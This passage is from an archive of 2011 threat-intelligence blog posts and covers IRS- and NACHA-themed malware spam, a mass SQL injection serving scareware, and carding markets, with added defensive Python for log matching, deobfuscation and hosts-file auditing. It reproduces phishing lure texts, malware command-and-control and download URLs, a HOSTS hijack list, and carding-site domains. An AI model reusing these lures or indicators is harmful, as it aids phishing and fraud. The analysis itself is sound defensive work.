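    "1313564610.456 95 10.0.0.15 TCP_MISS/200 312 GET http://RATTSILLIS.COM:80/ftp/g.php?id=3 - DIRECT/195.189.226.109 text/html",
    "1313564611.789 80 10.0.0.22 TCP_MISS/200 9876 GET http://www.example.com/index.html - DIRECT/93.184.216.34 text/html",
    "1314672185.001 140 10.0.0.31 TCP_MISS/200 189440 GET http://rattsillis.com/blood.exe - DIRECT/178.208.77.247 application/octet-stream",
]

if __name__ == "__main__":
    for hit in match_logs(SAMPLE_LOG):
        print(hit)
    print("shared C&C hosts:", shared_hosts(CAMPAIGN_URLS))
```

Matching on host and path rather than on the full URL string is the deliberate choice here: the g.php check-in carries a query string that changes per victim, and a proxy may log the host in whatever case the client sent. Hash matching stays exact, since the brief already shows the operator rotating the binaries behind a fixed filename, so a hash hit identifies a known build while a URL hit identifies the campaign.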

This post has been reproduced from [7]Dancho 
Danchev's blog. Follow him [8]on Twitter. 

1. http://www.zdnet.com/blog/security/spamvertised-uniform-traffic-tickets-and-invoices-lead-to-malware/9289
2. http://www.zdnet.com/blog/security/malware-watch-fdic-and-western-union-themed-emails-lead-to-malware/9328
3. http://www.virustotal.com/file-scan/report.html?id=ca67a14bfed2a7bc2ac8be9c01cb17d5da12b75320b4bad4fe8d8a6759ad9725-1315139717
4. http://www.virustotal.com/file-scan/report.html?id=50b104c5f8314327e03b01e7f7c2535d8de7cd9f73f8e16d1364c7fd021a90cc-1315139775
5. http://www.virustotal.com/file-scan/report.html?id=1741ef5d24641ee99b5d78a68109162bebc714c3d19abc37e3d4472f3dcd6f18-1315161281
6. http://labs.m86security.com/2011/09/an-analysis-of-the-ach-spam-campaign/
7. http://ddanchev.blogspot.com/
8. http://twitter.com/danchodanchev
Summarizing ZDNet's Zero Day Posts for September 
(2011-10-04 14:37) 

The following is a brief summary of all of my posts at ZDNet's 
Zero Day for September. You can subscribe to my 

[l]personal RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 

01. [3]Spamvertised 'Facebook notification' leads to exploits 
and malware 










02. [4]Google, Mozilla and Microsoft ban the DigiNotar 
Certificate Authority in their browsers 

03. [5]Microsoft themed ransomware variant spotted in the 
wild 

04. [6]'Man in wheelchair falls down the elevator shaft' scam 
spreading on Facebook 

05. [7]New ransomware variant uses false child porn 
accusations 

06. [8]Russian Embassy in London hit by a DDoS attack 

07. [9]uTorrent.com hacked, serving scareware 

08. [10]Bank of Melbourne Twitter account hacked, 
spreading phishing links 

09. [ll]Malicious spam campaigns proliferating 

10. [12]Spamvertised 'We are going to sue you' emails lead 
to malware 
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11. [13]XSS bug in Skype for iPhone, iPad allows address 
book theft 

12. [14]Researcher releases details on 6 SCADA 
vulnerabilities 

13. [15]DIY botnet kit spotted in the wild 

14. [16]New Mac OS X trojan poses as malicious PDF file 

15. [17]Survey: 60 percent of users use the same password 
across more than one of their online accounts 



This post has been reproduced from [18]Dancho 
Danchev's blog. Follow him [19]on Twitter. 

1. http://www.zdnet.com/topics/dancho+danchev?p=1&mode=rss&tag=mantle_skin;content

2. http://feeds.feedburner.com/zdnet/security

3. http://www.zdnet.com/blog/security/spamvertised-facebook-notification-leads-to-exploits-and-malware/9334

4. http://www.zdnet.com/blog/security/google-mozilla-and-microsoft-ban-the-diginotar-certificate-authority-in-their-browsers/9337

5. http://www.zdnet.com/blog/security/microsoft-themed-ransomware-variant-spotted-in-the-wild/9341

6. http://www.zdnet.com/blog/security/man-in-wheelchair-falls-down-the-elevator-shaft-scam-spreading-on-facebook/9403

7. http://www.zdnet.com/blog/security/new-ransomware-variant-uses-false-child-porn-accusations-/9406

8. http://www.zdnet.com/blog/security/russian-embassy-in-london-hit-by-a-ddos-attack/9409

9. http://www.zdnet.com/blog/security/utorrentcom-hacked-serving-scareware/9413

10. http://www.zdnet.com/blog/security/bank-of-melbourne-twitter-account-hacked-spreading-phishing-links/9415

11. http://www.zdnet.com/blog/security/malicious-spam-campaigns-proliferating/9420

12. http://www.zdnet.com/blog/security/spamvertised-we-are-going-to-sue-you-emails-lead-to-malware/9423

13. http://www.zdnet.com/blog/security/xss-bug-in-skype-for-iphone-ipad-allows-address-book-theft/9426

14. http://www.zdnet.com/blog/security/researcher-releases-details-on-6-scada-vulnerabilities/9432

15. http://www.zdnet.com/blog/security/diy-botnet-kit-spotted-in-the-wild/9440

16. http://www.zdnet.com/blog/security/new-mac-os-x-trojan-poses-as-malicious-pdf-file/9486

17. http://www.zdnet.com/blog/security/survey-60-percent-of-users-use-the-same-password-across-more-than-one-of-their-online-accounts/9489

18. http://ddanchev.blogspot.com/

19. http://twitter.com/danchodanchev
Dear Valued Client,

We strongly believe that your account may have been compromised. Due to this, we cancelled the last ACH transactions: 

-(ID: 13104924) 

-(ID: 04804768) 

-(ID: 37527025) 

-(ID: 51633547) 

initiated from your bank account by you or any other person, who might have access to your account. 

Detailed report on initiated transactions and reasons for cancellation can be found in the attachment. 

Spamvertised "NACHA security nitification" Serving 
Malware - Historical OSINT (2011-10-04 14:38) 


The following intelligence brief will offer historical OSINT on the "NACHA security nitification" malware campaign - the typo is intentionally left, as this is how the original campaign was spamvertised.

Spamvertised body: 

Dear Valued Client, We strongly believe that your account may have been compromised. Due to this, we cancelled the last ACH transactions: -(ID: 13104924) -(ID: 04804768) -(ID: 37527025) -(ID: 51633547) initiated from your bank account by you or any other person, who might have access to your account. Detailed report on initiated transactions and reasons for cancellation can be found in the attachment.


The ACH transaction (ID: 83612541), recently sent from your 
bank account (by you or any other person), was rejected by 
the Electronic Payments Association. 

########################## 

##################### 

Canceled transaction 

Transaction ID: 83612541 

Reason of rejection See details in the report below 

Transaction Report report_1409.pdf.zip (ZIP archive, Adobe 
PDF) 


########################## 

##################### 




13450 Sunrise Valley Drive, Suite 100 Herndon, VA 20171 
(703) 561-1100 

2011 NACHA - The Electronic Payments Association 

Spamvertised attachments: report_1409.pdf.zip; Report- 
8764.zip 

Detection rate: 

Report-8764.exe - [1]Gen:Trojan.Heur.FU.bqW@amtJU@oi - 39/43 (90.7 %)

MD5 : 7c131fa05e01fc32d8f4efe53aa883d1

SHA1 : 14d52d76dd7ccc595554486027634bf8c9877036

SHA256: 1ad11c1193f0dbcae3766e5cb4094acc137c10430d615e55470cbc41ce6cd03a

Upon execution the sample phones back to: 

onemoretimehi.ru/piety.exe - 188.65.208.59; 178.208.91.192 - Email: admin@onemoretimehi.ru

onemoretimehi.ru/ftp/g.php

piety.exe - MD5: 4bd87ecc4423f0bc15e229ecbf33aa2c

onemoretimehi.ru/tops.exe - MD5: f076dbc365ec7bfc438ad3c728702122; 86c7489ac539a0b57a4d075e723075f0

This post has been reproduced from [2]Dancho Danchev's blog. Follow him [3]on Twitter.

1. http://www.virustotal.com/file-scan/report.html?id=1ad11c1193f0dbcae3766e5cb4094acc137c10430d615e55470cbc41ce6cd03a-1317676852

2. http://ddanchev.blogspot.com/

3. http://twitter.com/danchodanchev
Tax notice.

There are arrears reckoned on your account over a period of 2010-2011 year. 
You will find all calculations according to your financial debt, enclosed. 

Sincerely, 

Internal Revenue Service. 


Spamvertised "IRS notice" Serving Malware (2011-10- 
09 19:53) 

Cybercriminals are spamvertising yet another malware-serving campaign. Impersonating the IRS, malicious attackers are attempting to entice end users into downloading and executing a malicious file attachment.

Spamvertised message: Tax notice, There are arrears reckoned on your account over a period of 2010-2011 year. You will find all calculations according to your financial debt, enclosed. Sincerely, Internal Revenue Service

Detection rate:

Calculations.exe - [1]TrojanDownloader:Win32/Dofoil.D - 33/43 (76.7 %)

MD5 : 178bb562d9c0ef2b0a87467dcbd945ee

SHA1 : 9ef75146aeb27102a1e5662284f369a43144225c

SHA256: d1551934d60033c871b377015c8be65d608b33543f149369d1e70361e06dc05e

Upon execution, it phones back to 

falcononfly2006.ru/blog/task.php?bid=2bfc680038ba2be7&os=5-1-2600&uptime=0&rnd=150156

falcononfly2006.ru - 91.229.90.139, AS6753 - Email: makrogerhouse@yandex.ru

makrogerhouse@yandex.ru is also associated with the 
following domains: 

diamondexchange2011.ru 

philippinemoney2011.ru 

Bedownloader2011.ru 

dolcekomarenoro2011.ru 

forsalgal02.ru 

runescapegpge2011.ru 

yomwarayom2001.ru 

philippinemoney2011.ru 



moneymgmt2011.ru 

moneykeep2011.ru 

firewallmakeover.ru 

czechmoney2011.ru 

communityspace2911.ru 

brazilianmoney2011.ru 

Monitoring of the campaign is ongoing.

This post has been reproduced from [2]Dancho Danchev's blog. Follow him [3]on Twitter.

1. http://www.virustotal.com/file-scan/report.html?id=d1551934d60033c871b377015c8be65d608b33543f149369d1e70361e06dc05e-1318162358

2. http://ddanchev.blogspot.com/

3. http://twitter.com/danchodanchev
Notice,


There are arrears reckoned on your account over a period of 2010-2011 year. 
You will find all calculations according to your financial debt, enclosed. 

You have to pay out the debt by the 17 December 2011. 


Yours sincerely, 

IRS. 

Spamvertised IRS-themed "Last Notice" Emails 
Serving Malware (2011-10-18 21:45) 

Cybercriminals are once again impersonating the Internal Revenue Service (IRS) for malware-serving purposes. In this intelligence brief, we'll dissect the malware campaign.

Spamvertised attachment: IRS Calculations #ID6749.zip

Spamvertised message: Notice, There are arrears 
reckoned on your account over a period of 2010-2011 year. 
You will find all calculations according to your financial debt, 
enclosed. You have to pay out the debt by the 17 December 
2011. Yours sincerely, IRS. 

Detection rate:

IRS_Calculations.exe - [1]W32/Yakes.B!tr - 34/40 (85.0 %)

MD5 : e44eb03582f030d30251e6be384f6b32

SHA1 : eaa3d76534d247d04987b8950965d0142d770b29

SHA256: 18386f49580298eee73688ce5e626a9e332886c25403a991495e0a3250c53e32

Upon execution phones back to:

bitgale.com/404.php?type=stats&affid=574&subid=01&iruns - 31.44.184.42; AS15884 - Email: davidsiddins@gxmailbox.com

shbsharri.com/arkivi_files/574-01.exe - returns "Bandwidth Limit Exceeded" - 74.55.50.202; AS21844 - Email: contact@privacyprotect.org

shbsharri.com/arkivi_files/setup.exe - returns "Bandwidth Limit Exceeded"

shbsharri.com/arkivi_files/sll6.exe - returns "Bandwidth Limit Exceeded"

shbsharri.com/arkivi_files/sssss.exe - returns "Bandwidth Limit Exceeded"

gansgansgroup.ru/true/index.php?cmd=getgrab - Connect to 91.229.90.139 on port 80 ... failed

gansgansgroup.ru/true/index.php?cmd=getproxy - Connect to 91.229.90.139 on port 80 ... failed

gansgansgroup.ru/true/index.php?cmd=getload&login=4117AF14E694E469C&sel=donat&ver=5.1&bits=0&file=1&run=ok

gansgansgroup.ru/true/index.php?cmd=getsocks&login=4117AF14E694E469C&port=11925

gansgansgroup.ru - 91.229.90.139; AS6753 (responding to 91.229.90.139 is also falcononfly2006.ru - Email: makrogerhouse@yandex.ru) - Email: gansgansgroup.ru@allperson.ru

The same email, makrogerhouse@yandex.ru, has been linked to a [2]previously spamvertised IRS-themed malware campaign.

Clearly, both campaigns have been launched by the same cybercriminal.

This post has been reproduced from [3]Dancho Danchev's blog. Follow him [4]on Twitter.

1. http://www.virustotal.com/file-scan/report.html?id=18386f49580298eee73688ce5e626a9e332886c25403a991495e0a3250c53e32-1318962605

2. http://ddanchev.blogspot.com/2011/10/spamvertised-irs-notice-serving-malware.html

3. http://ddanchev.blogspot.com/
[Screenshot: HTTP/1.1 200 OK response for the injected urchin.js - Date: Wed, 19 Oct 2011 11:24:05 GMT; Server: Apache/2.2.19; Last-Modified: Wed, 19 Oct 2011 11:20:03 GMT; Content-Length: 7592; Content-Type: application/javascript. The body is an obfuscated script: an array of decimal strings ('78742', '78742', '78835', '78843', ...), each reduced by 78732 inside a loop and converted with String.fromCharCode(), with the assembled string passed to eval().]

[Screenshot: domain/IP graph showing bookfula.com, bookgusa.com, bookvila.com, bookzula.com, filedl.com, www.filedl.com and nbnjkl.com resolving into 146.185.248.0/24, AS43134.]
Dissecting the Ongoing Mass SQL Injection Attack 
(2011-10-20 23:36) 

The [1]ongoing mass SQL injection attack has already affected over a [2]million web sites. Cybercriminals performing [3]active search engine [4]reconnaissance have managed to inject a malicious script into ASP and ASP.NET websites.

From [5]client-side exploits to bogus Adobe Flash players, the campaign is active and ongoing. In this intelligence brief, we'll dissect the campaign and establish a direct connection between the campaign and last March's [6]Lizamoon mass SQL injection attack.


SQL injected domains - thanks to Dasient's Tufan Demir for the ping:

nbnjkl.com/urchin.js - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com

jjghui.com/urchin.js - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com

bookzula.com/ur.php - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com

bookgusa.com/ur.php - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com

dfrgcc.com/ur.php - Email: jamesnorthone@hotmailbox.com

statsl.com/ur.php - 111.22.111.111 - Email: jamesnorthone@hotmailbox.com

milapop.com/ur.php - Email: jamesnorthone@hotmailbox.com

jhgukn.com/ur.php - Email: jamesnorthone@hotmailbox.com

vovmml.com/ur.php - Email: jamesnorthone@hotmailbox.com

bookvivi.com/ur.php - Email: jamesnorthone@hotmailbox.com

Responding to 146.185.248.3 is also file-dl.com; bookfula.com and bookvila.com - Email: jamesnorthone@hotmailbox.com

Detection rate for urchin.js:

urchin.js - [7]Trojan.JS.Redirector - 17/42 (40.5 %)

MD5 : 4387f9be5af4087d21c4b44b969a870f

SHA1 : 8a47842ccf6d642043ee8db99d0530336eef6b99

SHA256: 975e62fe1d9415b9fa06e8f826f776ef851bd030c2c897bc3fbee207519f8351

The redirections take place as follows:

• bookzula.com/ur.php -> www3.topasarmy.in/?w4q593n= (Email: bill.swinson@yahoo.com) -> firstrtscaner.rr.nu

• nbnjkl.com/urchin.js -> power-wfchecker.in/?Idlia916= - Email: bill.swinson@yahoo.com
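The urchin.js served from the injected domains (see the captured HTTP response reproduced ahead of this post) hides its payload as an array of decimal strings, subtracts 78732 from each element in a loop and hands the String.fromCharCode() result to eval(). The Python below is an added example, not code from the post or from the campaign: it reproduces that arithmetic statically so the redirect target can be read without executing any JavaScript. The sample script, its variable names and the URL it decodes to are constructed for this example; only the 78732 offset and the overall shape come from the captured response.

```python
"""Statically decode the numeric-array obfuscation seen in the injected urchin.js.

Added example, not code from the post or from the campaign. The captured script
keeps every character of the real payload as a decimal string, subtracts a fixed
offset (78732 in the screenshot) inside a loop and passes the String.fromCharCode()
output to eval(). Repeating that arithmetic in Python recovers the payload without
ever running the JavaScript.
"""
import re

OFFSET = 78732  # per-element subtraction visible in the captured script

# Constructed sample payload and script: variable names, statements and the URL
# are made up for this example and are not the campaign's real redirect target.
SAMPLE_PAYLOAD = (
    "\n\nredirect_to = 'http://example.invalid/landing';\n"
    "location.href = redirect_to;"
)
SAMPLE_SCRIPT = (
    "var E=[" + ", ".join(f"'{ord(ch) + OFFSET}'" for ch in SAMPLE_PAYLOAD) + "];\n"
    "var temp='';\n"
    "var QQ='';\n"
    "for (i=0; i<E.length; i++){\n"
    "  QQ=E[i]-" + str(OFFSET) + ";\n"
    "  temp=temp+String.fromCharCode(QQ);\n"
    "}\n"
    "eval(temp);\n"
)

# An array literal consisting only of quoted decimal strings.
_ARRAY_RE = re.compile(r"\[\s*((?:'\d+'\s*,\s*)*'\d+')\s*\]")
# The subtraction applied to each element, e.g. "E[i]-78732".
_OFFSET_RE = re.compile(r"\[\s*\w+\s*\]\s*-\s*(\d+)")


def decode_charcode_array(script: str) -> str:
    """Return the string the script would have assembled and passed to eval()."""
    array_match = _ARRAY_RE.search(script)
    if array_match is None:
        raise ValueError("no array of quoted decimal strings found")
    codes = [int(c) for c in re.findall(r"'(\d+)'", array_match.group(1))]

    offset_match = _OFFSET_RE.search(script)
    if offset_match is None:
        raise ValueError("no per-element subtraction found; offset unknown")
    offset = int(offset_match.group(1))

    chars = []
    for code in codes:
        value = code - offset
        if not 0 <= value <= 0x10FFFF:
            raise ValueError(f"{code} - {offset} is not a valid code point")
        chars.append(chr(value))
    return "".join(chars)


def extract_urls(text: str) -> list[str]:
    """Pull http(s) URLs out of a decoded payload for blocklisting and triage."""
    return re.findall(r"https?://[^\s'\"<>]+", text)


if __name__ == "__main__":
    decoded = decode_charcode_array(SAMPLE_SCRIPT)
    print(decoded)
    print("redirect targets:", extract_urls(decoded))
```

For a real capture, pass the response body to decode_charcode_array() and treat the hosts returned by extract_urls() as indicators to block and hunt for in proxy logs; because nothing is evaluated, a payload that in turn contains a second obfuscation layer simply comes back as text for another pass.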

bill.swinson@yahoo.com has also been used to register the 
following scareware-serving domains: 



uberble-safe.in 


uberate-safe.in 

best-jsentinel.in 

topantivir-foru.in 

personalscannerlg.in 

rideusfor.in 

hardbsy-network.in

enablesecureum.in 

hardynauchecker.in 

best-jsentinel.in 

smartklhdefense.in 

smartaasecurity.in 

personal-scan-4u.in 

unieve-safe.in 

safe-solutionsoft.in 

hugeble-cure.in 

topsecuritykauu.in 

personalcleansoft.in 

powerscanercis.in 

topksfsecurity.in 



hard-antivirbjb.in 

strong-guardbxz.in 

smart-suiteguard.in 

thebestkrearmy.in 

smart-guardianro.in 

freeopenscanerpo.in 

best-networkqjo.in 

hard-antivirbjb.in 

smartantivir-scanner.in 

most-popularsoftcontent.in

bester-msecuriity.in

doneahme.in

strong-checkerwrt.in 

safepowerforu.in 

safe-securityarmy.in 

personal-bpsentinel.in 

personalcleansoft.in 

ostestsystemri.in

saveinternet-guard.in 

just-perfectprotection.in 

firstholdermvq.in 

just-perfectprotection.in 

allcle-safe.in 

brawaidme.in 

uniind-safe.in 

moreaz-fine.in 

trueeox-safe.in 

safexanet.in 

personal-internet-foryou.in 

For the time being, the campaign is redirecting to a fake YouTube page enticing users into downloading a bogus Adobe Flash player in order to view the video.



Detection rate for the bogus Adobe Flash player: 

scandisk.exe - [8]Backdoor:Win32/Simda.A - 8/43 (18.6 %)

MD5 : fb4c93935346d2d8605598535528506e

SHA1 : 0ff7ccd785c0582e33c22f9b21156929ba7abaeb

SHA256: b204586cbac1606637361dd788b691f342cb1c582d10690209a989b040dab632

Upon execution the sample phones back to: 
209.212.147.141/chrome/report.html

98.142.243.64/chrome/report.html

update.19runsl0q3.com - 65.98.83.115

The same phone back locations have been used in a variety of related malware - thanks to Kaspersky's David Jacoby for the ping. For instance, in [9]this malware sample that's also phoning back to the same URLs, we have active HOSTS file modification as follows:

See related post: [10]Sampling Malicious Activity Inside Cybercrime-Friendly Search Engines

www.google.com. = 87.125.87.99;
google.com. = 87.125.87.103;
google.com.au. = 87.125.87.104;
www.google.com.au. = 87.125.87.147;
google.be. = 77.125.87.148;
www.google.be. = 77.125.87.149;
google.com.br. = 77.125.87.109;
www.google.com.br. = 77.125.87.150;
google.ca. = 77.125.87.152;
www.google.ca. = 77.125.87.153;
google.ch. = 77.125.87.155;
www.google.ch. = 77.125.87.158;
google.de. = 77.125.87.160;
www.google.de. = 77.125.87.161;
google.dk. = 92.125.87.123;
www.google.dk. = 92.125.87.160;
google.fr. = 92.125.87.154;
www.google.fr. = 92.125.87.134;
google.ie. = 92.125.87.170;
www.google.ie. = 92.125.87.177;
google.it. = 92.125.87.173;
www.google.it. = 92.125.87.147;
google.co.jp. = 92.125.87.103;
www.google.co.jp. = 84.125.87.147;
google.nl. = 84.125.87.103;
www.google.nl. = 84.125.87.147;
google.no. = 84.125.87.103;
www.google.no. = 84.125.87.147;
google.co.nz. = 84.125.87.103;
www.google.co.nz. = 84.125.87.147;
google.pl. = 84.125.87.103;
www.google.pl. = 64.125.87.147;
google.se. = 64.125.87.103;
www.google.se. = 64.125.87.147;
google.co.uk. = 64.125.87.103;
www.google.co.uk. = 64.125.87.147;
google.co.za. = 64.125.87.103;
www.google.co.za. = 64.125.87.147;
www.google-analytics.com. = 64.125.87.101;
www.bing.com. = 92.123.68.97;
search.yahoo.com. = 72.30.186.249;
www.search.yahoo.com. = 72.30.186.249;
uk.search.yahoo.com. = 87.248.112.8;
ca.search.yahoo.com. = 100.6.239.84;
de.search.yahoo.com. = 87.248.112.8;
fr.search.yahoo.com. = 87.248.112.8;
au.search.yahoo.com. = 87.248.112.8;
ad-emea.doubleclick.net. = 64.125.87.101;
www.statcounter.com. = 64.125.87.101;
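The HOSTS entries above pin search and advertising hostnames to attacker-controlled addresses, so every search and much of the page's analytics traffic can be intercepted. The Python below is an added example, not code from the post or from the pastebin it cites: it parses a hosts file in its native IP-then-hostnames layout and flags any Google, Bing, Yahoo, DoubleClick or StatCounter hostname mapped anywhere other than loopback, and separately lists other public-address overrides for manual review. The sample hosts content is constructed, mixing normal loopback lines and an internal override with a few IP/hostname pairs copied from the listing; the WATCHED_LABELS set is an assumption chosen to cover the brands that listing contains.

```python
"""Audit a hosts file for hijacked search and analytics hostnames.

Added example, not code from the post. The HOSTS modifications the post lists
map Google, Bing, Yahoo, DoubleClick and StatCounter hostnames to
attacker-controlled addresses. This checker flags any such hostname that is
pinned anywhere other than loopback and lists other public-address overrides
for review.
"""
import ipaddress

# Constructed sample hosts file: two normal loopback lines, an internal override
# that should not be flagged, and hostname/IP pairs copied from the post's listing
# (without the trailing dot the listing shows; hosts files do not use it).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
10.0.0.5        intranet.corp.example    # legitimate internal override
87.125.87.99    www.google.com
87.125.87.103   google.com
92.123.68.97    www.bing.com
72.30.186.249   search.yahoo.com www.search.yahoo.com
64.125.87.101   www.google-analytics.com ad-emea.doubleclick.net
"""

# Assumed watch list: DNS labels of the brands hijacked in the post's listing.
WATCHED_LABELS = {"google", "google-analytics", "bing", "yahoo", "doubleclick", "statcounter"}


def parse_hosts(text):
    """Return (ip, hostname) pairs; comments, blanks and malformed lines are skipped."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # not an address in the first column
        for host in parts[1:]:
            pairs.append((parts[0], host.lower().rstrip(".")))
    return pairs


def is_watched(hostname):
    """True when any label of the hostname names a watched brand."""
    return any(label in WATCHED_LABELS for label in hostname.split("."))


def audit_hosts(text):
    """Return (hostname, ip, reason) for every entry that deserves attention."""
    findings = []
    for ip, host in parse_hosts(text):
        addr = ipaddress.ip_address(ip)
        if addr.is_loopback or addr.is_unspecified:
            continue  # ordinary localhost / blackhole entries
        if is_watched(host):
            findings.append((host, ip, "search/analytics hostname pinned to a non-loopback address"))
        elif addr.is_global:
            findings.append((host, ip, "public address override, review manually"))
    return findings


def hijacked_hosts(text):
    """Just the hostnames that match the hijacking pattern from the post."""
    return [host for host, _ip, reason in audit_hosts(text) if reason.startswith("search/analytics")]


if __name__ == "__main__":
    for host, ip, reason in audit_hosts(SAMPLE_HOSTS):
        print(f"{host:30} {ip:16} {reason}")
```

Private-range overrides such as the intranet line are deliberately left alone, since split-horizon entries are common on managed machines; anything resolving a watched brand, or pointing at a public address, is what an incident responder should compare against the addresses in the listing above.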

[11]The Lizamoon mass SQL injection connection

The same email used to register the SQL injected domains, jamesnorthone@hotmailbox.com, has been used to register the Lizamoon mass SQL injection attack domains extensively profiled here - "[12]Dissecting the Massive SQL Injection Attack Serving Scareware".

Related posts:

• [13]SQL Injection Through Search Engines Reconnaissance 

• [14]Massive SQL Injections Through Search Engine's 
Reconnaissance - Part Two 

• [15]Massive SQL Injection Attacks - the Chinese Way 

• [16]Cybercriminals SQL Inject Cybercrime-friendly Proxies 
Service 

• [17]GoDaddy's Mass WordPress Blogs Compromise Serving 
Scareware 



• [18]Dissecting the WordPress Blogs Compromise at 
Network Solutions 

• [19]Yet Another Massive SQL Injection Spotted in the Wild 

• [20]Smells Like a Copycat SQL Injection In the Wild 

• [21]Fast-Fluxing SQL Injection Attacks 

• [22]Obfuscating Fast-fluxed SQL Injected Domains 

This post has been reproduced from [23]Dancho 
Danchev's blog. Follow him [24]on Twitter. 

1. http://www.zdnet.com/blog/security/over-a-million-web-sites-affected-in-mass-sql-injection-attack/9662

2. http://i.zdnet.com/blogs/mass_sql_injection_attack.png

3. http://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines.html

4. http://ddanchev.blogspot.com/2009/04/massive-sql-injections-through-search.html

5. http://blog.armorize.com/2011/10/httpjjghuicomurchinjs-mass-infection.html

6. http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html

7. http://www.virustotal.com/file-scan/report.html?id=975e62fe1d9415b9fa06e8f826f776ef851bd030c2c897bc3fbee207519f8351-1318924415

8. http://www.virustotal.com/file-scan/report.html?id=b204586cbac1606637361dd788b691f342cb1c582d10690209a989b040dab632-1319047251

9. http://pastebin.com/EEHVb6ux

10. http://ddanchev.blogspot.com/2010/07/sampling-malicious-activity-inside.html
11. http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html

12. http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html

13. http://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines.html

14. http://ddanchev.blogspot.com/2009/04/massive-sql-injections-through-search.html

15. http://ddanchev.blogspot.com/2008/10/massive-sql-injection-attacks-chinese.html

16. http://ddanchev.blogspot.com/2010/07/cybercriminals-sql-inject-cybercrime.html

17. http://ddanchev.blogspot.com/2010/04/godaddys-mass-wordpress-blogs.html

18. http://ddanchev.blogspot.com/2010/04/dissecting-wordpress-blogs-compromise.html

19. http://ddanchev.blogspot.com/2008/05/yet-another-massive-sql-injection.html

20. http://ddanchev.blogspot.com/2008/07/smells-like-copycat-sql-injection-in.html

21. http://ddanchev.blogspot.com/2008/05/fast-fluxing-sql-injection-attacks.html

22. http://ddanchev.blogspot.com/2008/07/obfuscating-fast-fluxed-sql-injected.html

23. http://ddanchev.blogspot.com/

24. http://twitter.com/danchodanchev
Exposing the Market for Stolen Credit Cards Data
(2011-10-31 02:07)

What's the [1]average price for a stolen credit card? How are [2]prices shaped within the cybercrime ecosystem? Can we talk about [3]price discrimination within the underground marketplace? Just how easy is it to purchase stolen credit cards, known as dumps or full dumps, nowadays?

In this intelligence brief, I will expose the market for stolen credit cards data by profiling 20 currently active and responding gateways for processing of fraudulently obtained financial data.

Key summary points:

• Tens of thousands of stolen credit cards a.k.a. dumps and full dumps offered for sale in a DIY market fashion

• The majority of the carding sites are hosted in the Ukraine and the Netherlands

• Liberty Reserve is the payment option of choice for the majority of the portals

• Four domains are using Yahoo accounts and one is using a Live.com account for domain registration

• Four of the domains are using identical name servers

• Each DIY gateway for processing of fraudulently obtained financial data has a built-in credit cards checker or offers links to external sites performing the service

• Several of the fraudulent gateways offered proxies-as-a-service, allowing cybercriminals to hide their real IPs by using the malware infected hosts as stepping stones

The dynamics of the cybercrime ecosystem share the same similarities with those of a legitimate marketplace. From sellers and buyers to bargain hunters, escrow agents, resellers and vendors specializing in a specific market segment, all the market participants remain active throughout the entire purchasing process. With ZeuS and SpyEye crimeware infections proliferating, it shouldn't be surprising that the average price for a stolen credit card is decreasing.



With massive dumps of credit card details in the hands of cybercriminals, obtained through [4]ATM skimming and crimeware botnets, the marketplace is getting over-crowded with trusted propositions for stolen credit card details.

What used to be a market where over-the-counter trade was the primary growth factor is today's highly standardized marketplace with DIY online interfaces, allowing anyone to join and purchase stolen credit card details. Naturally, the vendors of dumps and full dumps are vertically integrating within the marketplace, and are offering additional services such as checkers for credit card validity, and proxies-as-a-service - [5]compromised malware infected hosts - allowing a potential cybercriminal the opportunity to hide their IP while using the recently purchased credit cards data.

How are prices shaped within this new and standardized market model for commodity goods such as stolen credit cards, and is price discrimination for stolen credit cards even feasible? The vendors currently offer fixed prices for the majority of credit cards, with slight increases in the price of a stolen credit card if the card is Premium. Bulk orders are naturally also considered a growth factor for the DIY interfaces, with slight discounts being offered for them.

As far as [6]price discrimination is concerned, the concept is long gone, and has become the victim of this ongoing standardization of the market. The same goes for penetration pricing, as the vendors of stolen credit card details now enjoy better underground market transparency into the fraudulent propositions of competing portals, helping them to set their prices more easily, without the need to lower the price in order to enter the market segment.

Let's profile the 20 gateways for processing of fraudulently obtained financial data. Responding IPs, registered emails, name servers, ASs, associated ICQ numbers and geolocation of the hosting IP are as follows:

ccmall.cc - 213.5.70.34 - Name server: TR1.ONLINESHOP.SU - Email: gwylhcfktm@whoisservices.cn - AS49544, INTERACTIVE3D-AS - HOSTED IN THE NETHERLANDS

track2.name - 91.213.175.121 - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE

trackstore.su - 46.21.148.26 - Email: roger.sroy@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN THE NETHERLANDS

magic-numbers.cc - 91.213.175.89; 91.223.77.35 - Name server: NS1.1000DNS.NET - Email: contact@privacyprotect.org - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE

allfresh.us - 46.21.144.115 - Name server: YNS1.YAHOO.COM - Email: keikomiyahara@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN THE NETHERLANDS

freshstock.biz - 38.97.225.166; 69.175.73.184 - Name server: NS1.PIPEDNS.COM - Email: ghmbfvntxs@whoisprivacyprotect.com - AS32475, SINGLEHOP, Inc. - HOSTED IN THE UNITED STATES

bulba.cc - 91.223.77.254 - Name server: NS1.NAMESELF.COM - Email: bulbacc@yahoo.com - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE

approven.su - 91.229.248.20 - Name server: dns1.naunet.ru - Email: yurtan20@e1.ru - HOSTED IN UKRAINE

cv2shop.com - 72.20.12.205 - Name server: DNS1.NAME-SERVICES.COM - Email: wnfxgjdg@whoisprivacyprotect.com - AS25761, STAMINUS-COMM - HOSTED IN THE UNITED STATES

vzone.tc - 49.212.25.242 - Name server: dns1.yandex.ru - Email: adamsnames@rrpproxy.net - AS9371, SAKURA-C SAKURA Internet - HOSTED IN JAPAN

